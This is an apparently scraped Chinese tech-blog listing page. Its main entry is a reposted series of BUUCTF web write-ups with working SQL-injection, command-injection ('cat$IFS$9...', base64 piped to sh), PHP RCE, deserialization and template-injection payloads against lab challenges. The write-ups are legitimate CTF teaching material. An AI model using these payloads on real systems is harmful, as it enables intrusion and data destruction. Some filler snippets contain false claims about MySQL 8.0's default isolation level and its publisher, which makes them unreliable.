随着Web技术的发展,JSON已经深入到我们日常开发的方方面面。它如同一条无形的信息高速公路,承载着网站间、系统间的数据流通。作为开发者,咱们得把JSON的使用窍门玩得贼溜,可别浪费了它的那些个优点。把它用得风生水起,让它在咱们的项目里发光发热,发挥出最大的价值,这才是正经事!当我们面对网站数据导入这样的需求时,不妨试着借助JSON的力量,你会发现,数据的搬运原来可以如此轻松自如,充满了无限可能!
2023-10-11 22:09:42
754
林中小径
Mongo
NoSQL数据库 , NoSQL(Not Only SQL)是一种非关系型数据库,它不采用传统的关系模型来存储数据,而是使用键值对、文档、列族、图形等多种数据模型进行存储。在MongoDB的语境下,其作为一种流行的NoSQL数据库,允许开发者以灵活的JSON-like文档格式存储数据,并且支持水平扩展和高可用性,尤其适合处理大量非结构化或半结构化的数据。 事务(Transaction) , 在数据库系统中,事务是一个不可分割的工作单元,它包含一系列操作,这些操作要么全部成功执行,要么全部失败回滚。在MongoDB中,从4.0版本开始支持事务功能,这意味着一组相关的数据库操作可以被封装在一个事务内,从而确保数据的一致性和完整性。事务必须满足ACID(原子性、一致性、隔离性、持久性)原则,即保证一次事务内的所有更改要么全部生效,要么全部撤销,不会出现部分生效导致的数据不一致状态。 原子性(Atomicity) , 原子性是事务处理的基本属性之一,在MongoDB中表现为一个事务中的所有操作要么全部完成,要么全部不执行。具体到文章中的电商网站示例,更新用户信息和商品库存的操作被封装在一个事务中,如果其中一个操作失败,那么整个事务将被回滚,以确保数据始终保持一致,不会处于中间状态,避免引发数据不一致的问题。
2023-12-06 15:41:34
135
时光倒流-t
转载文章
...!! 那么如何查询到数据呢? select 函数被过滤了,其实mysql的函数有很多 这里通过 MYSQL的预处理语句,使用 : concat('s','elect',' from 1919810931114514') 完成绕过 构造pyload: 1';PREPARE test from concat('s','elect',' from 1919810931114514');EXECUTE test; flag{3b3d8fa2-2348-4d6b-81af-017ca90e6c81} [SUCTF 2019]EasySQL 环境我已经启动了 进入题目链接 老套路 先看看源码里面有什么东西 不出意料的什么都没有 但是提示我们它是POST传参 这是一道SQL注入的题目 不管输入什么数字,字母 都是这的 没有回显 但是输入:0没有回显 不知道为啥 而且输入:1' 也不报错 同样是没有回显 尝试注入时 显示Nonono. 也就是说,没有回显,联合查询基本没戏。 好在页面会进行相应的变化,证明注入漏洞肯定是有的。 而且注入点就是这个POST参数框 看了大佬的WP 才想起来 还有堆叠注入 堆叠注入原理 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入:1; DELETE FROM products服务器端生成的sql语句为:(因未对输入的参数进行过滤)Select from products where productid=1;DELETE FROM products当执行查询后,第一条显示查询信息,第二条则将整个表进行删除。 1;show databases; 1;show tables; 1;use ctf;show tables; 跑字典时 发现了好多的过滤 哭了 没有办法… 看到上面主要是有两中返回,一种是空白,一种是nonono。 在网上查writeup看到 输入1显示:Array ( [0] => 1 )输入a显示:空白输入所有非0数字都显示:Array ( [0] => 1 )输入所有字母(除过滤的关键词外)都显示空白 可以推测题目应该是用了||符号。 推测出题目应该是select $_post[value] || flag from Flag。 这里 就有一个符号|| 当有一边为数字时 运算结果都为 true 返回1 使用 || 运算符,不在是做或运算 而是作为拼接字符串的作用 在oracle 缺省支持 通过 || 来实现字符串拼接,但在mysql 缺省不支持 需要调整mysql 的sql_mode 模式:pipes_as_concat 来实现oracle 的一些功能。 这个意思是在oracle中 || 是作为字符串拼接,而在mysql中是运算符。 当设置sql_mode为pipes_as_concat的时候,mysql也可以把 || 作为字符串拼接。 修改完后,|| 就会被认为是字符串拼接符 MySQL中sql_mode参数,具体的看这里 解题思路1: payload:,1 查询语句:select ,1||flag from Flag 解题思路2: 堆叠注入,使得sql_mode的值为PIPES_AS_CONCAT payload:1;set sql_mode=PIPES_AS_CONCAT;select 1 解析: 在oracle 缺省支持 通过 ‘ || ’ 来实现字符串拼接。但在mysql 缺省不支持。需要调整mysql 的sql_mode模式:pipes_as_concat 来实现oracle 的一些功能。 flag出来了 头秃 不是很懂 看了好多的wp… [GYCTF2020]Blacklist 进入题目链接 1.注入:1’ 为'闭合 2.看字段:1' order by 2 确认字段为2 3.查看回显:1’ union select 1,2 发现过滤字符 与上面的随便注很像 ,太像了,增加了过滤规则。 修改表名和set均不可用,所以很直接的想到了handler语句。 4.但依旧可以用堆叠注入获取数据库名称、表名、字段。 1';show databases 获取数据库名称1';show tables 获取表名1';show columns from FlagHere ; 或 1';desc FlagHere; 获取字段名 5.接下来用 handler语句读取内容。 1';handler FlagHere open;handler FlagHere read first 直接得到 flag 成功解题。 flag{d0c147ad-1d03-4698-a71c-4fcda3060f17} 补充handler语句相关。 mysql除可使用select查询表中的数据,也可使用handler语句 这条语句使我们能够一行一行的浏览一个表中的数据,不过handler语句并不 具备select语句的所有功能。它是mysql专用的语句,并没有包含到SQL标准中 [GKCTF2020]cve版签到 查看提示 菜鸡的第一步 提示了:cve-2020-7066 赶紧去查了一下 cve-2020-7066PHP 7.2.29之前的7.2.x版本、7.3.16之前的7.3.x版本和7.4.4之前的7.4.x版本中的‘get_headers()’函数存在安全漏洞。攻击者可利用该漏洞造成信息泄露。 描述在低于7.2.29的PHP版本7.2.x,低于7.3.16的7.3.x和低于7.4.4的7.4.x中,将get_headers()与用户提供的URL一起使用时,如果URL包含零(\ 0)字符,则URL将被静默地截断。这可能会导致某些软件对get_headers()的目标做出错误的假设,并可能将某些信息发送到错误的服务器。 利用方法 总的来说也就是get_headers()可以被%00截断 进入题目链接 知识点: cve-2020-7066利用 老套路:先F12查看源码 发现提示:Flag in localhost 根据以上 直接上了 直接截断 因为提示host必须以123结尾,这个简单 所以需要将localhost替换为127.0.0.123 成功得到flag flag{bf1243d2-08dd-44ee-afe8-45f58e2d6801} GXYCTF2019禁止套娃 考点: .git源码泄露 无参RCE localeconv() 函数返回一包含本地数字及货币格式信息的数组。scandir() 列出 images 目录中的文件和目录。readfile() 输出一个文件。current() 返回数组中的当前单元, 默认取第一个值。pos() current() 的别名。next() 函数将内部指针指向数组中的下一个元素,并输出。array_reverse()以相反的元素顺序返回数组。highlight_file()打印输出或者返回 filename 文件中语法高亮版本的代码。 具体细节,看这里 进入题目链接 上御剑扫目录 发现是.git源码泄露 上githack补全源码 得到源码 <?phpinclude "flag.php";echo "flag在哪里呢?<br>";if(isset($_GET['exp'])){if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {// echo $_GET['exp'];@eval($_GET['exp']);}else{die("还差一点哦!");} }else{die("再好好想想!");} }else{die("还想读flag,臭弟弟!");} }// highlight_file(__FILE__);?> 既然getshell基本不可能,那么考虑读源码 看源码,flag应该就在flag.php 我们想办法读取 首先需要得到当前目录下的文件 scandir()函数可以扫描当前目录下的文件,例如: <?phpprint_r(scandir('.'));?> 那么问题就是如何构造scandir('.') 这里再看函数: localeconv() 函数返回一包含本地数字及货币格式信息的数组。而数组第一项就是. current() 返回数组中的当前单元, 默认取第一个值。 pos() current() 的别名。 这里还有一个知识点: current(localeconv())永远都是个点 那么就很简单了 print_r(scandir(current(localeconv())));print_r(scandir(pos(localeconv()))); 第二步:读取flag所在的数组 之后我们利用array_reverse() 将数组内容反转一下,利用next()指向flag.php文件==>highlight_file()高亮输出 payload: ?exp=show_source(next(array_reverse(scandir(pos(localeconv()))))); [De1CTF 2019]SSRF Me 首先得到提示 还有源码 进入题目链接 得到一串py 经过整理后 ! /usr/bin/env pythonencoding=utf-8from flask import Flaskfrom flask import requestimport socketimport hashlibimport urllibimport sysimport osimport jsonreload(sys)sys.setdefaultencoding('latin1')app = Flask(__name__)secert_key = os.urandom(16)class Task:def __init__(self, action, param, sign, ip):python得构造方法self.action = actionself.param = paramself.sign = signself.sandbox = md5(ip)if(not os.path.exists(self.sandbox)): SandBox For Remote_Addros.mkdir(self.sandbox)def Exec(self):定义的命令执行函数,此处调用了scan这个自定义的函数result = {}result['code'] = 500if (self.checkSign()):if "scan" in self.action:action要写scantmpfile = open("./%s/result.txt" % self.sandbox, 'w')resp = scan(self.param) 此处是文件读取得注入点if (resp == "Connection Timeout"):result['data'] = respelse:print resp 输出结果tmpfile.write(resp)tmpfile.close()result['code'] = 200if "read" in self.action:action要加readf = open("./%s/result.txt" % self.sandbox, 'r')result['code'] = 200result['data'] = f.read()if result['code'] == 500:result['data'] = "Action Error"else:result['code'] = 500result['msg'] = "Sign Error"return resultdef checkSign(self):if (getSign(self.action, self.param) == self.sign): !!!校验return Trueelse:return Falsegenerate Sign For Action Scan.@app.route("/geneSign", methods=['GET', 'POST']) !!!这个路由用于测试def geneSign():param = urllib.unquote(request.args.get("param", "")) action = "scan"return getSign(action, param)@app.route('/De1ta',methods=['GET','POST'])这个路由是我萌得最终注入点def challenge():action = urllib.unquote(request.cookies.get("action"))param = urllib.unquote(request.args.get("param", ""))sign = urllib.unquote(request.cookies.get("sign"))ip = request.remote_addrif(waf(param)):return "No Hacker!!!!"task = Task(action, param, sign, ip)return json.dumps(task.Exec())@app.route('/')根目录路由,就是显示源代码得地方def index():return open("code.txt","r").read()def scan(param):这是用来扫目录得函数socket.setdefaulttimeout(1)try:return urllib.urlopen(param).read()[:50]except:return "Connection Timeout"def getSign(action, param):!!!这个应该是本题关键点,此处注意顺序先是param后是actionreturn hashlib.md5(secert_key + param + action).hexdigest()def md5(content):return hashlib.md5(content).hexdigest()def waf(param):这个waf比较没用好像check=param.strip().lower()if check.startswith("gopher") or check.startswith("file"):return Trueelse:return Falseif __name__ == '__main__':app.debug = Falseapp.run(host='0.0.0.0') 相关函数 作用 init(self, action, param, …) 构造方法self代表对象,其他是对象的属性 request.args.get(param) 提取get方法传入的,参数名叫param对应得值 request.cookies.get(“action”) 提取cookie信息中的,名为action得对应值 hashlib.md5().hexdigest() hashlib.md5()获取一个md5加密算法对象,hexdigest()是获得加密后的16进制字符串 urllib.unquote() 将url编码解码 urllib.urlopen() 读取网络文件参数可以是url json.dumps Python 对象编码成 JSON 字符串 这个题先放一下… [极客大挑战 2019]EasySQL 进入题目链接 直接上万能密码 用户随意 admin1' or 1; 得到flag flag{7fc65eb6-985b-494a-8225-de3101a78e89} [极客大挑战 2019]Havefun 进入题目链接 老套路 去F12看看有什么东西 很好 逮住了 获取FLAG的条件是cat=dog,且是get传参 flag就出来了 flag{779b8bac-2d64-4540-b830-1972d70a2db9} [极客大挑战 2019]Secret File 进入题目链接 老套路 先F12查看 发现超链接 直接逮住 既然已经查阅结束了 中间就肯定有一些我们不知道的东西 过去了 上burp看看情况 我们让他挺住 逮住了:secr3t.php 访问一下 简单的绕过 就可以了 成功得到一串字符 进行base解密即可 成功逮住flag flag{ed90509e-d2d1-4161-ae99-74cd27d90ed7} [ACTF2020 新生赛]Include 根据题目信息 是文件包含无疑了 直接点击进来 用php伪协议 绕过就可以了 得到一串编码 base64解密即可 得到flag flag{c09e6921-0c0e-487e-87c9-0937708a78d7} 2018]easy_tornado 都点击一遍 康康 直接filename变量改为:fllllllllllllag 报错了 有提示 render() 是一个渲染函数 具体看这里 就用到SSTI模板注入了 具体看这里 尝试模板注入: /error?msg={ {1} } 发现存在模板注入 md5(cookie_secret+md5(filename)) 分析题目: 1.tornado是一个python的模板,可能会产生SSTI注入漏洞2.flag在/fllllllllllllag中3.render是python中的一个渲染函数,也就是一种模板,通过调用的参数不同,生成不同的网页4.可以推断出filehash的值为md5(cookie_secret+md5(filename)) 根据目前信息,想要得到flag就需要获取cookie_secret 因为tornado存在模版注入漏洞,尝试通过此漏洞获取到所需内容 根据测试页面修改msg得值发现返回值 可以通过msg的值进行修改,而在 taornado框架中存在cookie_secreat 可以通过/error?msg={ {handler.settings} }拿到secreat_cookie 综合以上结果 拿脚本跑一下 得到filehash: ed75a45308da42d3fe98a8f15a2ad36a 一直跑不出来 不知道为啥子 [极客大挑战 2019]LoveSQL 万能密码尝试 直接上万能密码 用户随意 admin1' or 1; 开始正常注入: 查字段:1' order by 3 经过测试 字段为3 查看回显:1’ union select 1,2,3 查数据库 1' union select 1,2,group_concat(schema_name) from information_schema.schemata 查表: [GXYCTF2019]Ping Ping Ping 考察:RCE的防护绕过 直接构造:?ip=127.0.0.1;ls 简单的fuzz一下 就发现=和$没有过滤 所以想到的思路就是使用$IFS$9代替空格,使用拼接变量来拼接出Flag字符串: 构造playload ?ip=127.0.0.1;a=fl;b=ag;cat$IFS$9$a$b 看看他到底过滤了什么:?ip=127.0.0.1;cat$IFS$1index.php 一目了然过滤了啥,flag字眼也过滤了,bash也没了,不过sh没过滤: 继续构造payload: ?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh 查看源码,得到flag flag{1fe312b4-96a0-492d-9b97-040c7e333c1a} [RoarCTF 2019]Easy Calc 进入题目链接 查看源码 发现calc.php 利用PHP的字符串解析特性Bypass,具体看这里 HP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事: 1.删除空白符2.将某些字符转换为下划线(包括空格) scandir():列出参数目录中的文件和目录 发现/被过滤了 ,可以用chr('47')代替 calc.php? num=1;var_dump(scandir(chr(47))) 这里直接上playload calc.php? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))) flag{76243df6-aecb-4dc5-879e-3964ec7485ee} [极客大挑战 2019]Knife 进入题目链接 根据题目Knife 还有这个一句话木马 猜想尝试用蚁剑连接 测试连接成功 确实是白给了flag [ACTF2020 新生赛]Exec 直接ping 发现有回显 构造playload: 127.0.0.1;cat /flag 成功拿下flag flag{7e582f16-2676-42fa-8b9d-f9d7584096a6} [极客大挑战 2019]PHP 进入题目链接 它提到了备份文件 就肯定是扫目录 把源文件的代码 搞出来 上dirsearch 下载看这里 很简单的使用方法 用来扫目录 -u 指定url -e 指定网站语言 -w 可以加上自己的字典,要带路径 -r 递归跑(查到一个目录后,重复跑) 打开index.php文件 分析这段内容 1.加载了一个class.php文件 2.采用get方式传递一个select参数 3.随后将之反序列化 打开class.php <?phpinclude 'flag.php';error_reporting(0);class Name{private $username = 'nonono';private $password = 'yesyes';public function __construct($username,$password){$this->username = $username;$this->password = $password;}function __wakeup(){$this->username = 'guest';}function __destruct(){if ($this->password != 100) {echo "</br>NO!!!hacker!!!</br>";echo "You name is: ";echo $this->username;echo "</br>";echo "You password is: ";echo $this->password;echo "</br>";die();}if ($this->username === 'admin') {global $flag;echo $flag;}else{echo "</br>hello my friend~~</br>sorry i can't give you the flag!";die();} }}?> 根据代码的意思可以知道,如果password=100,username=admin 在执行_destruct()的时候可以获得flag 构造序列化 <?phpclass Name{private $username = 'nonono';private $password = 'yesyes';public function __construct($username,$password){$this->username = $username;$this->password = $password;} }$a = new Name('admin', 100);var_dump(serialize($a));?> 得到了序列化 O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;} 但是 还有要求 1.跳过__wakeup()函数 在反序列化字符串时,属性个数的值大于实际属性个数时,就可以 2.private修饰符的问题 private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时,类名和字段名前面都会加上\0的前缀。字符串长度也包括所加前缀的长度 构造最终的playload ?select=O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;} [极客大挑战 2019]Http 进入题目链接 查看 源码 发现了 超链接的标签 说我们不是从https://www.Sycsecret.com访问的 进入http://node3.buuoj.cn:27883/Secret.php 抓包修改一下Referer 执行一下 随后提示我们浏览器需要使用Syclover, 修改一下User-Agent的内容 就拿到flag了 [HCTF 2018]admin 进入题目链接 这道题有三种解法 1.flask session 伪造 2.unicode欺骗 3.条件竞争 发现 登录和注册功能 随意注册一个账号啦 登录进来之后 登录 之后 查看源码 发现提示 猜测 我们登录 admin账号 即可看见flag 在change password页面发现 访问后 取得源码 第一种方法: flask session 伪造 具体,看这里 flask中session是存储在客户端cookie中的,也就是存储在本地。flask仅仅对数据进行了签名。众所周知的是,签名的作用是防篡改,而无法防止被读取。而flask并没有提供加密操作,所以其session的全部内容都是可以在客户端读取的,这就可能造成一些安全问题。 [极客大挑战 2019]BabySQL 进入题目链接 对用户名进行测试 发现有一些关键字被过滤掉了 猜测后端使用replace()函数过滤 11' oorr 1=1 直接尝试双写 万能密码尝试 双写 可以绕过 查看回显: 1' uniunionon selselectect 1,2,3 over!正常 开始注入 爆库 爆列 爆表 爆内容 本篇文章为转载内容。原文链接:https://blog.csdn.net/wo41ge/article/details/109162753。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-11-13 21:30:33
303
转载
MySQL
...何在MySQL中新建数据库之后,进一步的探索可以聚焦于数据库优化、安全性管理以及最新的MySQL版本特性。近日,MySQL 8.0版本的发布带来了许多重要更新,如窗口函数的增强、JSON支持的改进以及默认事务隔离级别的变更(从REPEATABLE READ变为READ COMMITTED),这些都为开发者提供了更高效、灵活的数据管理工具。 针对数据库性能优化,了解索引原理与实践策略至关重要。例如,选择合适的索引类型(B树、哈希、全文等),合理设计表结构以减少JOIN操作的复杂度,以及定期分析并优化执行计划,都是提升MySQL数据库性能的关键手段。 此外,随着数据安全问题日益凸显,MySQL的安全配置和权限管理同样值得深入研究。学习如何设置复杂的密码策略、实现用户访问审计、利用SSL加密传输数据,以及对备份与恢复策略进行定制化设计,是确保数据库系统稳定运行和数据安全的重要步骤。 综上所述,在掌握了MySQL数据库的基础创建操作后,持续关注MySQL最新动态,深入了解数据库性能调优和安全管理领域,将极大地助力您在实际项目中构建更加健壮、高效的数据库架构。
2023-08-12 18:53:34
138
码农
JQuery
...。另外,对于CSV、JSON等特殊格式的字符串转换,可以借助于专门的数据处理库如papaparse(CSV)和json5(JSON),这些库能帮助开发者高效准确地将字符串内容转化为可进一步操作的数据结构。 同时,随着ES6及后续版本的发布,JavaScript语言本身也在不断强化对字符串操作的支持,诸如模板字面量、扩展运算符以及新增的String.prototype.matchAll()等方法,都为字符串处理提供了更为强大的内建能力。 因此,前端开发者在面对字符串分割问题时,除了掌握基础的split()方法之外,还应持续关注和学习现代JavaScript特性和相关工具库的发展,以便在实际项目中更加灵活高效地进行字符串处理。通过深入了解并合理运用这些资源,能够有效提升代码质量与开发效率,更好地应对各种前端开发挑战。
2023-12-16 18:58:28
409
逻辑鬼才
JSON
JSON , JavaScript Object Notation,是一种轻量级的数据交换格式。它基于纯文本,采用完全独立于语言的文本格式来存储和传输数据,易于人阅读和编写,同时也易于机器解析和生成。在本文中,JSON被用于PHP程序中进行前后端数据交互,通过json_decode函数可以将JSON字符串转换为PHP对象或数组,反之,通过json_encode函数可将PHP数组转换为JSON格式的字符串。 PHP对象 , 在PHP编程语言中,对象是一种复杂的数据类型,它是类的实例化结果,包含了数据(属性)和方法(功能)。在处理JSON时,通过json_decode函数将JSON数据转换为PHP对象后,可以通过“->”运算符访问其内部的属性,例如在文章示例中的 $data->name、$data->age 和 $data->city 就分别代表了从JSON数据转换得到的PHP对象的属性值。 前后端数据交互 , 在Web应用程序开发中,前后端数据交互是指客户端(前端,如浏览器中的JavaScript代码)与服务器端(后端,如PHP脚本)之间传递、接收和处理数据的过程。在这个过程中,JSON扮演着重要的角色,因为它的易读性和跨语言兼容性使得它可以作为不同环境间通用的数据交换格式。例如,在PHP环境中,通过将PHP数组编码成JSON格式发送给前端,或者将前端发送过来的JSON数据解码为PHP数组,实现数据的有效传递和共享。
2023-01-18 13:53:09
461
算法侠
MySQL
...提升、安全增强以及对JSON文档处理能力的大幅改进。MySQL官方持续优化其在Linux环境下的运行效能,用户可通过查阅官方文档学习如何根据自身服务器硬件配置和业务需求调整MySQL的配置参数以实现最佳性能。 此外,对于企业级应用而言,MySQL的高可用性和扩展性至关重要。为确保服务稳定,很多企业采用主从复制、分片集群等高级部署架构,并借助于ProxySQL等中间件进行流量管理和负载均衡。同时,Percona Server for MySQL和MariaDB作为MySQL的两大分支,也在不断推出新功能并优化性能,为用户提供更多选择。 值得一提的是,随着容器化和云原生技术的发展,MySQL在Kubernetes集群中的部署实践也日益丰富。通过Operator模式或者Helm Chart等方式,可以更便捷地在云环境中部署和管理MySQL实例,实现自动化运维和弹性伸缩。 综上所述,掌握MySQL在Linux系统上的安装路径只是基础操作之一,深入了解MySQL的最新特性、部署策略及云环境下的运维实践,将有助于广大开发者和DBA更好地构建和维护高性能、高可用的数据库服务。
2023-12-31 14:25:35
112
软件工程师
HTML
...处理问题后,我们发现数据预处理是数据分析流程中的关键环节。近日,一项关于数据清洗的研究引起了业界广泛关注。据《Nature》杂志今年的一项报道,研究人员在分析大规模公开数据集时,强调了对非结构化或混合格式数据进行有效清洗的重要性。他们指出,在Web抓取的数据集中,HTML标签、JavaScript代码等非数据内容常会嵌入到CSV或其他文本格式的数据中,这不仅加大了数据解析难度,还可能引入误差。 实际上,许多现代数据处理工具如Pandas库和Apache NiFi等已经提供了应对此类问题的功能扩展。例如,Pandas可以通过自定义函数结合正则表达式实现对特定字段内HTML代码的清理,而Apache NiFi则支持实时数据流处理,可在数据流入系统时就完成格式转换和清洗工作。 此外,Python社区近期推出的一款专门针对Web数据抓取与清洗的库“BeautifulSoup”,它不仅能高效解析HTML文档结构,还能配合csv模块无缝衔接CSV文件处理,帮助用户更方便地从包含HTML元素的CSV数据中提取所需信息。 总的来说,理解和掌握如何识别并清除CSV文件中的HTML代码对于提升数据质量、确保后续分析结果准确至关重要。随着大数据时代的来临,关注并跟进此类实用技巧及最新研究进展,将有助于数据工作者更好地应对复杂多变的数据环境。
2023-01-04 22:21:53
479
数据库专家
MySQL
...的更新,提供了更快的数据处理速度、增强的安全性以及改进的JSON支持等功能,这对于开发者来说是一个提高数据库性能和安全性的绝佳机会(来源:MySQL官方博客)。此外,随着云服务的发展,各大云平台如AWS、Azure和阿里云等均提供便捷的MySQL实例部署和管理方案,让开发者无需在本地安装即可进行开发和测试工作。 对于Python开发者而言,除了pymysql之外,还有其他第三方库如SQLAlchemy和Django ORM等能够更高效地与MySQL数据库进行交互,实现复杂查询操作和对象关系映射功能。同时,为了提升数据库设计与优化能力,建议深入阅读《MySQL高性能优化》等相关书籍,学习索引原理、查询优化策略以及事务与锁机制等高级主题,从而更好地利用MySQL构建高效稳定的系统架构。 另外,在实际开发过程中,MySQL集群和高可用性解决方案也是值得研究的方向,例如使用MySQL Group Replication或Percona XtraDB Cluster实现实时同步和故障切换,确保数据服务的连续性和可靠性。持续关注MySQL社区、官方文档和技术博客,将有助于紧跟技术潮流,不断提升自身数据库开发与管理能力。
2023-04-24 15:12:40
49
电脑达人
JSON
...分十进制小数无法精确转换为二进制,从而在进行数学运算时可能会出现精度丢失的问题,如文章中提到的0.1与0.2相加结果不等于预期的0.3。 JSON (JavaScript Object Notation) , JSON是一种轻量级的数据交换格式,它基于JavaScript的一个子集,易于人阅读和编写,同时也易于机器解析和生成。JSON数据由键值对构成,其值可以是字符串、数字、布尔值、数组、null以及其它嵌套的JSON对象。在Web开发领域,JSON广泛应用于前后端之间的数据传输,因为它具有良好的跨语言兼容性,便于不同系统之间进行数据交换。 WebAssembly , WebAssembly是一种低级的类汇编语言,设计初衷是为了在现代网络浏览器中实现接近本机代码性能的高性能应用。WebAssembly模块可以在多种编程语言(如C/C++、Rust等)中编写并编译成字节码形式,然后在浏览器环境中运行。尽管文章中未直接提及WebAssembly,但在处理高精度计算或需要优化性能的场景下,它可以作为一种解决方案,通过在JavaScript环境中执行WebAssembly模块以达到更精确的浮点数运算效果,进而解决JSON中数值精度问题。
2023-03-17 15:37:33
314
程序媛
MySQL
...审批功能与MySQL数据库的紧密协作后,我们可以进一步探索现代企业级应用如何借助前沿技术优化内部流程。近日,腾讯云发布了全新的“企业服务套件”,其中包含了针对财务管理环节的智能报销系统。该系统不仅支持微信小程序便捷提交报销申请,更深度集成了大数据与AI算法,可实时分析报销数据、识别潜在风险,并通过机器学习不断优化审批逻辑。 同时,MySQL作为开源关系型数据库的重要代表,在全球范围内持续获得广泛应用和升级优化。MariaDB Foundation近期发布的MySQL 8.0新版本,对性能、安全性以及JSON支持等方面进行了显著提升,使得诸如报销审批这类复杂业务场景下的数据处理更为高效稳定。 另外,随着《个人信息保护法》等法规的实施,企业在利用数据库管理用户敏感信息时面临更高的合规要求。微信小程序与MySQL在实际运用中也需严格遵守法律法规,确保用户数据的安全存储与合理使用,例如采用加密传输、访问控制等措施保障报销审批过程中涉及的员工个人信息安全。 综上所述,微信小程序与MySQL数据库在企业报销审批中的实践案例是数字化转型浪潮中的一个缩影,而围绕这一领域的新技术发展与政策变化将为未来的企业运营管理带来更为智能化、安全化的解决方案。
2023-08-09 15:20:34
98
软件工程师
Mongo
...非常强大的NoSQL数据库系统,它提供了许多高效的数据处理方式,如高效的查询、聚合等。不过呢,如果你刚刚接触MongoDB这个小家伙,可能会对如何在它里面批量地插数据、更新信息这些操作犯迷糊。这篇文章将详细介绍如何在MongoDB中实现这些操作。 二、批量插入操作 在MongoDB中,我们可以使用insertMany()方法来实现批量插入操作。让我们来看一个简单的例子: javascript // 假设我们要插入一批用户数据 const users = [ { name: 'John', age: 25 }, { name: 'Jane', age: 30 }, { name: 'Doe', age: 35 } ]; // 使用insertMany()方法进行批量插入 db.users.insertMany(users); 在这个例子中,我们首先定义了一个包含多个用户对象的数组,然后使用insertMany()方法一次性将所有用户插入到users集合中。 三、批量更新操作 在MongoDB中,我们可以使用updateMany()方法来实现批量更新操作。同样,我们来看一个例子: javascript // 假设我们要更新一批用户的年龄 db.users.updateMany( { age: {$lt: 30} }, // 找出年龄小于30岁的用户 { $set: { age: 30 } } // 将他们的年龄设置为30岁 ); 在这个例子中,我们首先使用updateMany()方法找出所有年龄小于30岁的用户,然后使用$set操作符将他们的年龄设置为30岁。 四、深入讨论 批量插入和更新操作不仅可以提高我们的开发效率,还可以减少网络传输的数量,从而提高性能。但是,我们也需要注意一些问题。 首先,如果我们要插入的数据量非常大,可能会导致内存溢出。这时候,我们可以琢磨一下分批添加数据的方法,或者尝试用类似insertDocuments()这种流式API来操作。 其次,如果我们误用了updateMany()方法,可能会更新到不应该更新的数据。为了避免这种情况,我们需要确保我们的条件匹配正确的数据。 总的来说,批量插入和更新操作是MongoDB中非常重要的一部分,熟练掌握它们可以帮助我们更有效地处理大量的数据。
2023-09-16 14:14:15
146
心灵驿站-t
站内搜索
用于搜索本网站内部文章,支持栏目切换。
知识学习
实践的时候请根据实际情况谨慎操作。
随机学习一条linux命令:
xargs -I{} command {} < list_of_files.txt
- 使用文件列表作为参数执行命令。
推荐内容
推荐本栏目内的其它文章,看看还有哪些文章让你感兴趣。
2023-04-28
2023-08-09
2023-06-18
2023-04-14
2023-02-18
2023-04-17
2024-01-11
2023-10-03
2023-09-09
2023-06-13
2023-08-07
2023-03-11
历史内容
快速导航到对应月份的历史文章列表。
随便看看
拉到页底了吧,随便看看还有哪些文章你可能感兴趣。
时光飞逝
"流光容易把人抛,红了樱桃,绿了芭蕉。"